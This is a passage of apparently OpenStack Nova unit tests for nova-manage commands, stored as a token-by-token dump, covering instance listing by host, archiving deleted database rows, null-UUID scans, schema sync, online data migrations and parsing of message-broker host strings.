newline|'\n'
nl|'\n'
dedent|''
name|'sys'
op|'.'
name|'stdout'
op|'='
name|'sys'
op|'.'
name|'__stdout__'
newline|'\n'
name|'result'
op|'='
name|'output'
op|'.'
name|'getvalue'
op|'('
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertIn'
op|'('
string|"'node'"
op|','
name|'result'
op|')'
comment|'# check the header line'
newline|'\n'
name|'self'
op|'.'
name|'assertIn'
op|'('
string|"'m1.tiny'"
op|','
name|'result'
op|')'
comment|'# flavor.name'
newline|'\n'
name|'self'
op|'.'
name|'assertIn'
op|'('
string|"'foo-host'"
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_list_with_host
dedent|''
name|'def'
name|'test_list_with_host'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'output'
op|'='
name|'StringIO'
op|'('
op|')'
newline|'\n'
name|'sys'
op|'.'
name|'stdout'
op|'='
name|'output'
newline|'\n'
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'objects'
op|'.'
name|'InstanceList'
op|','
string|"'get_by_host'"
op|')'
name|'as'
name|'get'
op|':'
newline|'\n'
indent|' '
name|'get'
op|'.'
name|'return_value'
op|'='
name|'objects'
op|'.'
name|'InstanceList'
op|'('
nl|'\n'
name|'objects'
op|'='
op|'['
name|'fake_instance'
op|'.'
name|'fake_instance_obj'
op|'('
nl|'\n'
name|'context'
op|'.'
name|'get_admin_context'
op|'('
op|')'
op|','
nl|'\n'
name|'flavor'
op|'='
name|'self'
op|'.'
name|'fake_flavor'
op|','
nl|'\n'
name|'system_metadata'
op|'='
op|'{'
op|'}'
op|')'
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'list'
op|'('
name|'host'
op|'='
string|"'fake-host'"
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'sys'
op|'.'
name|'stdout'
op|'='
name|'sys'
op|'.'
name|'__stdout__'
newline|'\n'
name|'result'
op|'='
name|'output'
op|'.'
name|'getvalue'
op|'('
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertIn'
op|'('
string|"'node'"
op|','
name|'result'
op|')'
comment|'# check the header line'
newline|'\n'
name|'self'
op|'.'
name|'assertIn'
op|'('
string|"'m1.tiny'"
op|','
name|'result'
op|')'
comment|'# flavor.name'
newline|'\n'
name|'self'
op|'.'
name|'assertIn'
op|'('
string|"'fake-host'"
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|DBCommandsTestCase
dedent|''
dedent|''
name|'class'
name|'DBCommandsTestCase'
op|'('
name|'test'
op|'.'
name|'NoDBTestCase'
op|')'
op|':'
newline|'\n'
DECL|member|setUp
indent|' '
name|'def'
name|'setUp'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'DBCommandsTestCase'
op|','
name|'self'
op|')'
op|'.'
name|'setUp'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'='
name|'manage'
op|'.'
name|'DbCommands'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_archive_deleted_rows_negative
dedent|''
name|'def'
name|'test_archive_deleted_rows_negative'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'1'
op|','
name|'self'
op|'.'
name|'commands'
op|'.'
name|'archive_deleted_rows'
op|'('
op|'-'
number|'1'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_archive_deleted_rows_large_number
dedent|''
name|'def'
name|'test_archive_deleted_rows_large_number'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'large_number'
op|'='
string|"'1'"
op|'*'
number|'100'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'1'
op|','
name|'self'
op|'.'
name|'commands'
op|'.'
name|'archive_deleted_rows'
op|'('
name|'large_number'
op|')'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'db'
op|','
string|"'archive_deleted_rows'"
op|','
nl|'\n'
name|'return_value'
op|'='
name|'dict'
op|'('
name|'instances'
op|'='
number|'10'
op|','
name|'consoles'
op|'='
number|'5'
op|')'
op|')'
newline|'\n'
DECL|member|_test_archive_deleted_rows
name|'def'
name|'_test_archive_deleted_rows'
op|'('
name|'self'
op|','
name|'mock_db_archive'
op|','
name|'verbose'
op|'='
name|'False'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'useFixture'
op|'('
name|'fixtures'
op|'.'
name|'MonkeyPatch'
op|'('
string|"'sys.stdout'"
op|','
name|'StringIO'
op|'('
op|')'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'archive_deleted_rows'
op|'('
number|'20'
op|','
name|'verbose'
op|'='
name|'verbose'
op|')'
newline|'\n'
name|'mock_db_archive'
op|'.'
name|'assert_called_once_with'
op|'('
number|'20'
op|')'
newline|'\n'
name|'output'
op|'='
name|'sys'
op|'.'
name|'stdout'
op|'.'
name|'getvalue'
op|'('
op|')'
newline|'\n'
name|'if'
name|'verbose'
op|':'
newline|'\n'
indent|' '
name|'expected'
op|'='
string|"'''\\\n+-----------+-------------------------+\n| Table | Number of Rows Archived |\n+-----------+-------------------------+\n| consoles | 5 |\n| instances | 10 |\n+-----------+-------------------------+\n'''"
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'output'
op|')'
newline|'\n'
dedent|''
name|'else'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'0'
op|','
name|'len'
op|'('
name|'output'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_archive_deleted_rows
dedent|''
dedent|''
name|'def'
name|'test_archive_deleted_rows'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
comment|"# Tests that we don't show any table output (not verbose)."
nl|'\n'
indent|' '
name|'self'
op|'.'
name|'_test_archive_deleted_rows'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_archive_deleted_rows_verbose
dedent|''
name|'def'
name|'test_archive_deleted_rows_verbose'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
comment|'# Tests that we get table output.'
nl|'\n'
indent|' '
name|'self'
op|'.'
name|'_test_archive_deleted_rows'
op|'('
name|'verbose'
op|'='
name|'True'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'db'
op|','
string|"'archive_deleted_rows'"
op|','
name|'return_value'
op|'='
op|'{'
op|'}'
op|')'
newline|'\n'
DECL|member|test_archive_deleted_rows_verbose_no_results
name|'def'
name|'test_archive_deleted_rows_verbose_no_results'
op|'('
name|'self'
op|','
name|'mock_db_archive'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'useFixture'
op|'('
name|'fixtures'
op|'.'
name|'MonkeyPatch'
op|'('
string|"'sys.stdout'"
op|','
name|'StringIO'
op|'('
op|')'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'archive_deleted_rows'
op|'('
number|'20'
op|','
name|'verbose'
op|'='
name|'True'
op|')'
newline|'\n'
name|'mock_db_archive'
op|'.'
name|'assert_called_once_with'
op|'('
number|'20'
op|')'
newline|'\n'
name|'output'
op|'='
name|'sys'
op|'.'
name|'stdout'
op|'.'
name|'getvalue'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIn'
op|'('
string|"'Nothing was archived.'"
op|','
name|'output'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'migration'
op|','
string|"'db_null_instance_uuid_scan'"
op|','
nl|'\n'
name|'return_value'
op|'='
op|'{'
string|"'foo'"
op|':'
number|'0'
op|'}'
op|')'
newline|'\n'
DECL|member|test_null_instance_uuid_scan_no_records_found
name|'def'
name|'test_null_instance_uuid_scan_no_records_found'
op|'('
name|'self'
op|','
name|'mock_scan'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'useFixture'
op|'('
name|'fixtures'
op|'.'
name|'MonkeyPatch'
op|'('
string|"'sys.stdout'"
op|','
nl|'\n'
name|'StringIO'
op|'('
op|')'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'null_instance_uuid_scan'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIn'
op|'('
string|'"There were no records found"'
op|','
name|'sys'
op|'.'
name|'stdout'
op|'.'
name|'getvalue'
op|'('
op|')'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'migration'
op|','
string|"'db_null_instance_uuid_scan'"
op|','
nl|'\n'
name|'return_value'
op|'='
op|'{'
string|"'foo'"
op|':'
number|'1'
op|','
string|"'bar'"
op|':'
number|'0'
op|'}'
op|')'
newline|'\n'
DECL|member|_test_null_instance_uuid_scan
name|'def'
name|'_test_null_instance_uuid_scan'
op|'('
name|'self'
op|','
name|'mock_scan'
op|','
name|'delete'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'useFixture'
op|'('
name|'fixtures'
op|'.'
name|'MonkeyPatch'
op|'('
string|"'sys.stdout'"
op|','
nl|'\n'
name|'StringIO'
op|'('
op|')'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'null_instance_uuid_scan'
op|'('
name|'delete'
op|')'
newline|'\n'
name|'output'
op|'='
name|'sys'
op|'.'
name|'stdout'
op|'.'
name|'getvalue'
op|'('
op|')'
newline|'\n'
nl|'\n'
name|'if'
name|'delete'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertIn'
op|'('
string|'"Deleted 1 records from table \'foo\'."'
op|','
name|'output'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertNotIn'
op|'('
string|'"Deleted 0 records from table \'bar\'."'
op|','
name|'output'
op|')'
newline|'\n'
dedent|''
name|'else'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertIn'
op|'('
string|'"1 records in the \'foo\' table"'
op|','
name|'output'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertNotIn'
op|'('
string|'"0 records in the \'bar\' table"'
op|','
name|'output'
op|')'
newline|'\n'
dedent|''
name|'self'
op|'.'
name|'assertNotIn'
op|'('
string|'"There were no records found"'
op|','
name|'output'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_null_instance_uuid_scan_readonly
dedent|''
name|'def'
name|'test_null_instance_uuid_scan_readonly'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_test_null_instance_uuid_scan'
op|'('
name|'delete'
op|'='
name|'False'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_null_instance_uuid_scan_delete
dedent|''
name|'def'
name|'test_null_instance_uuid_scan_delete'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_test_null_instance_uuid_scan'
op|'('
name|'delete'
op|'='
name|'True'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'sqla_migration'
op|','
string|"'db_version'"
op|','
name|'return_value'
op|'='
number|'2'
op|')'
newline|'\n'
DECL|member|test_version
name|'def'
name|'test_version'
op|'('
name|'self'
op|','
name|'sqla_migrate'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'commands'
op|'.'
name|'version'
op|'('
op|')'
newline|'\n'
name|'sqla_migrate'
op|'.'
name|'assert_called_once_with'
op|'('
name|'database'
op|'='
string|"'main'"
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'sqla_migration'
op|','
string|"'db_sync'"
op|')'
newline|'\n'
DECL|member|test_sync
name|'def'
name|'test_sync'
op|'('
name|'self'
op|','
name|'sqla_sync'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'commands'
op|'.'
name|'sync'
op|'('
name|'version'
op|'='
number|'4'
op|')'
newline|'\n'
name|'sqla_sync'
op|'.'
name|'assert_called_once_with'
op|'('
name|'version'
op|'='
number|'4'
op|','
name|'database'
op|'='
string|"'main'"
op|')'
newline|'\n'
nl|'\n'
DECL|member|_fake_db_command
dedent|''
name|'def'
name|'_fake_db_command'
op|'('
name|'self'
op|','
name|'migrations'
op|'='
name|'None'
op|')'
op|':'
newline|'\n'
indent|' '
name|'if'
name|'migrations'
name|'is'
name|'None'
op|':'
newline|'\n'
indent|' '
name|'mock_mig_1'
op|'='
name|'mock'
op|'.'
name|'MagicMock'
op|'('
name|'__name__'
op|'='
string|'"mock_mig_1"'
op|')'
newline|'\n'
name|'mock_mig_2'
op|'='
name|'mock'
op|'.'
name|'MagicMock'
op|'('
name|'__name__'
op|'='
string|'"mock_mig_2"'
op|')'
newline|'\n'
name|'mock_mig_1'
op|'.'
name|'return_value'
op|'='
op|'('
number|'5'
op|','
number|'4'
op|')'
newline|'\n'
name|'mock_mig_2'
op|'.'
name|'return_value'
op|'='
op|'('
number|'6'
op|','
number|'6'
op|')'
newline|'\n'
name|'migrations'
op|'='
op|'('
name|'mock_mig_1'
op|','
name|'mock_mig_2'
op|')'
newline|'\n'
nl|'\n'
DECL|class|_CommandSub
dedent|''
name|'class'
name|'_CommandSub'
op|'('
name|'manage'
op|'.'
name|'DbCommands'
op|')'
op|':'
newline|'\n'
DECL|variable|online_migrations
indent|' '
name|'online_migrations'
op|'='
name|'migrations'
newline|'\n'
nl|'\n'
dedent|''
name|'return'
name|'_CommandSub'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'nova.context.get_admin_context'"
op|')'
newline|'\n'
DECL|member|test_online_migrations
name|'def'
name|'test_online_migrations'
op|'('
name|'self'
op|','
name|'mock_get_context'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ctxt'
op|'='
name|'mock_get_context'
op|'.'
name|'return_value'
newline|'\n'
name|'command_cls'
op|'='
name|'self'
op|'.'
name|'_fake_db_command'
op|'('
op|')'
newline|'\n'
name|'command'
op|'='
name|'command_cls'
op|'('
op|')'
newline|'\n'
name|'command'
op|'.'
name|'online_data_migrations'
op|'('
number|'10'
op|')'
newline|'\n'
name|'command_cls'
op|'.'
name|'online_migrations'
op|'['
number|'0'
op|']'
op|'.'
name|'assert_called_once_with'
op|'('
name|'ctxt'
op|','
number|'10'
op|')'
newline|'\n'
name|'command_cls'
op|'.'
name|'online_migrations'
op|'['
number|'1'
op|']'
op|'.'
name|'assert_called_once_with'
op|'('
name|'ctxt'
op|','
number|'6'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'nova.context.get_admin_context'"
op|')'
newline|'\n'
DECL|member|test_online_migrations_no_max_count
name|'def'
name|'test_online_migrations_no_max_count'
op|'('
name|'self'
op|','
name|'mock_get_context'
op|')'
op|':'
newline|'\n'
indent|' '
name|'total'
op|'='
op|'['
number|'120'
op|']'
newline|'\n'
name|'batches'
op|'='
op|'['
number|'50'
op|','
number|'40'
op|','
number|'30'
op|','
number|'0'
op|']'
newline|'\n'
name|'runs'
op|'='
op|'['
op|']'
newline|'\n'
nl|'\n'
DECL|function|fake_migration
name|'def'
name|'fake_migration'
op|'('
name|'context'
op|','
name|'count'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'mock_get_context'
op|'.'
name|'return_value'
op|','
name|'context'
op|')'
newline|'\n'
name|'runs'
op|'.'
name|'append'
op|'('
name|'count'
op|')'
newline|'\n'
name|'count'
op|'='
name|'batches'
op|'.'
name|'pop'
op|'('
number|'0'
op|')'
newline|'\n'
name|'total'
op|'['
number|'0'
op|']'
op|'-='
name|'count'
newline|'\n'
name|'return'
name|'total'
op|'['
number|'0'
op|']'
op|','
name|'count'
newline|'\n'
nl|'\n'
dedent|''
name|'command_cls'
op|'='
name|'self'
op|'.'
name|'_fake_db_command'
op|'('
op|'('
name|'fake_migration'
op|','
op|')'
op|')'
newline|'\n'
name|'command'
op|'='
name|'command_cls'
op|'('
op|')'
newline|'\n'
name|'command'
op|'.'
name|'online_data_migrations'
op|'('
name|'None'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
op|'['
op|']'
op|','
name|'batches'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'0'
op|','
name|'total'
op|'['
number|'0'
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
op|'['
number|'50'
op|','
number|'50'
op|','
number|'50'
op|','
number|'50'
op|']'
op|','
name|'runs'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_online_migrations_error
dedent|''
name|'def'
name|'test_online_migrations_error'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_migration'
op|'='
name|'mock'
op|'.'
name|'MagicMock'
op|'('
op|')'
newline|'\n'
name|'fake_migration'
op|'.'
name|'side_effect'
op|'='
name|'Exception'
newline|'\n'
name|'command_cls'
op|'='
name|'self'
op|'.'
name|'_fake_db_command'
op|'('
op|'('
name|'fake_migration'
op|','
op|')'
op|')'
newline|'\n'
name|'command'
op|'='
name|'command_cls'
op|'('
op|')'
newline|'\n'
name|'command'
op|'.'
name|'online_data_migrations'
op|'('
name|'None'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_online_migrations_bad_max
dedent|''
name|'def'
name|'test_online_migrations_bad_max'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'127'
op|','
nl|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'online_data_migrations'
op|'('
name|'max_count'
op|'='
op|'-'
number|'2'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'127'
op|','
nl|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'online_data_migrations'
op|'('
name|'max_count'
op|'='
string|"'a'"
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'127'
op|','
nl|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'online_data_migrations'
op|'('
name|'max_count'
op|'='
number|'0'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_online_migrations_no_max
dedent|''
name|'def'
name|'test_online_migrations_no_max'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'commands'
op|','
string|"'_run_migration'"
op|')'
name|'as'
name|'rm'
op|':'
newline|'\n'
indent|' '
name|'rm'
op|'.'
name|'return_value'
op|'='
number|'0'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'0'
op|','
nl|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'online_data_migrations'
op|'('
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_online_migrations_finished
dedent|''
dedent|''
name|'def'
name|'test_online_migrations_finished'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'commands'
op|','
string|"'_run_migration'"
op|')'
name|'as'
name|'rm'
op|':'
newline|'\n'
indent|' '
name|'rm'
op|'.'
name|'return_value'
op|'='
number|'0'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'0'
op|','
nl|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'online_data_migrations'
op|'('
name|'max_count'
op|'='
number|'5'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_online_migrations_not_finished
dedent|''
dedent|''
name|'def'
name|'test_online_migrations_not_finished'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'commands'
op|','
string|"'_run_migration'"
op|')'
name|'as'
name|'rm'
op|':'
newline|'\n'
indent|' '
name|'rm'
op|'.'
name|'return_value'
op|'='
number|'5'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'1'
op|','
nl|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'online_data_migrations'
op|'('
name|'max_count'
op|'='
number|'5'
op|')'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|ApiDbCommandsTestCase
dedent|''
dedent|''
dedent|''
name|'class'
name|'ApiDbCommandsTestCase'
op|'('
name|'test'
op|'.'
name|'NoDBTestCase'
op|')'
op|':'
newline|'\n'
DECL|member|setUp
indent|' '
name|'def'
name|'setUp'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'ApiDbCommandsTestCase'
op|','
name|'self'
op|')'
op|'.'
name|'setUp'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'='
name|'manage'
op|'.'
name|'ApiDbCommands'
op|'('
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'sqla_migration'
op|','
string|"'db_version'"
op|','
name|'return_value'
op|'='
number|'2'
op|')'
newline|'\n'
DECL|member|test_version
name|'def'
name|'test_version'
op|'('
name|'self'
op|','
name|'sqla_migrate'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'commands'
op|'.'
name|'version'
op|'('
op|')'
newline|'\n'
name|'sqla_migrate'
op|'.'
name|'assert_called_once_with'
op|'('
name|'database'
op|'='
string|"'api'"
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'sqla_migration'
op|','
string|"'db_sync'"
op|')'
newline|'\n'
DECL|member|test_sync
name|'def'
name|'test_sync'
op|'('
name|'self'
op|','
name|'sqla_sync'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'commands'
op|'.'
name|'sync'
op|'('
name|'version'
op|'='
number|'4'
op|')'
newline|'\n'
name|'sqla_sync'
op|'.'
name|'assert_called_once_with'
op|'('
name|'version'
op|'='
number|'4'
op|','
name|'database'
op|'='
string|"'api'"
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|CellCommandsTestCase
dedent|''
dedent|''
name|'class'
name|'CellCommandsTestCase'
op|'('
name|'test'
op|'.'
name|'NoDBTestCase'
op|')'
op|':'
newline|'\n'
DECL|member|setUp
indent|' '
name|'def'
name|'setUp'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'CellCommandsTestCase'
op|','
name|'self'
op|')'
op|'.'
name|'setUp'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'='
name|'manage'
op|'.'
name|'CellCommands'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_transport_hosts_multiple
dedent|''
name|'def'
name|'test_create_transport_hosts_multiple'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test the _create_transport_hosts method\n when broker_hosts is set.\n """'
newline|'\n'
name|'brokers'
op|'='
string|'"127.0.0.1:5672,127.0.0.2:5671"'
newline|'\n'
name|'thosts'
op|'='
name|'self'
op|'.'
name|'commands'
op|'.'
name|'_create_transport_hosts'
op|'('
nl|'\n'
string|"'guest'"
op|','
string|"'devstack'"
op|','
nl|'\n'
name|'broker_hosts'
op|'='
name|'brokers'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'2'
op|','
name|'len'
op|'('
name|'thosts'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'127.0.0.1'"
op|','
name|'thosts'
op|'['
number|'0'
op|']'
op|'.'
name|'hostname'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'5672'
op|','
name|'thosts'
op|'['
number|'0'
op|']'
op|'.'
name|'port'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'127.0.0.2'"
op|','
name|'thosts'
op|'['
number|'1'
op|']'
op|'.'
name|'hostname'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'5671'
op|','
name|'thosts'
op|'['
number|'1'
op|']'
op|'.'
name|'port'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_transport_hosts_single
dedent|''
name|'def'
name|'test_create_transport_hosts_single'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test the _create_transport_hosts method when hostname is passed."""'
newline|'\n'
name|'thosts'
op|'='
name|'self'
op|'.'
name|'commands'
op|'.'
name|'_create_transport_hosts'
op|'('
string|"'guest'"
op|','
string|"'devstack'"
op|','
nl|'\n'
name|'hostname'
op|'='
string|"'127.0.0.1'"
op|','
nl|'\n'
name|'port'
op|'='
number|'80'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'1'
op|','
name|'len'
op|'('
name|'thosts'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'127.0.0.1'"
op|','
name|'thosts'
op|'['
number|'0'
op|']'
op|'.'
name|'hostname'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'80'
op|','
name|'thosts'
op|'['
number|'0'
op|']'
op|'.'
name|'port'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_transport_hosts_single_broker
dedent|''
name|'def'
name|'test_create_transport_hosts_single_broker'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test the _create_transport_hosts method for single broker_hosts."""'
newline|'\n'
name|'thosts'
op|'='
name|'self'
op|'.'
name|'commands'
op|'.'
name|'_create_transport_hosts'
op|'('
nl|'\n'
string|"'guest'"
op|','
string|"'devstack'"
op|','
nl|'\n'
name|'broker_hosts'
op|'='
string|"'127.0.0.1:5672'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'1'
op|','
name|'len'
op|'('
name|'thosts'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'127.0.0.1'"
op|','
name|'thosts'
op|'['
number|'0'
op|']'
op|'.'
name|'hostname'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'5672'
op|','
name|'thosts'
op|'['
number|'0'
op|']'
op|'.'
name|'port'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_transport_hosts_both
dedent|''
name|'def'
name|'test_create_transport_hosts_both'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test the _create_transport_hosts method when both broker_hosts\n and hostname/port are passed.\n """'
newline|'\n'
name|'thosts'
op|'='
name|'self'
op|'.'
name|'commands'
op|'.'
name|'_create_transport_hosts'
op|'('
nl|'\n'
string|"'guest'"
op|','
string|"'devstack'"
op|','
nl|'\n'
name|'broker_hosts'
op|'='
string|"'127.0.0.1:5672'"
op|','
nl|'\n'
name|'hostname'
op|'='
string|"'127.0.0.2'"
op|','
name|'port'
op|'='
number|'80'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'1'
op|','
name|'len'
op|'('
name|'thosts'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'127.0.0.1'"
op|','
name|'thosts'
op|'['
number|'0'
op|']'
op|'.'
name|'hostname'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'5672'
op|','
name|'thosts'
op|'['
number|'0'
op|']'
op|'.'
name|'port'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_transport_hosts_wrong_val
dedent|''
name|'def'
name|'test_create_transport_hosts_wrong_val'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test the _create_transport_hosts method when broker_hosts\n is wrongly sepcified\n """'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'ValueError'
op|','
nl|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'_create_transport_hosts'
op|','
nl|'\n'
string|"'guest'"
op|','
string|"'devstack'"
op|','
nl|'\n'
name|'broker_hosts'
op|'='
string|"'127.0.0.1:5672,127.0.0.1'"
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_transport_hosts_wrong_port_val
dedent|''
name|'def'
name|'test_create_transport_hosts_wrong_port_val'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test the _create_transport_hosts method when port in\n broker_hosts is wrongly sepcified\n """'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'ValueError'
op|','
nl|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'_create_transport_hosts'
op|','
nl|'\n'
string|"'guest'"
op|','
string|"'devstack'"
op|','
nl|'\n'
name|'broker_hosts'
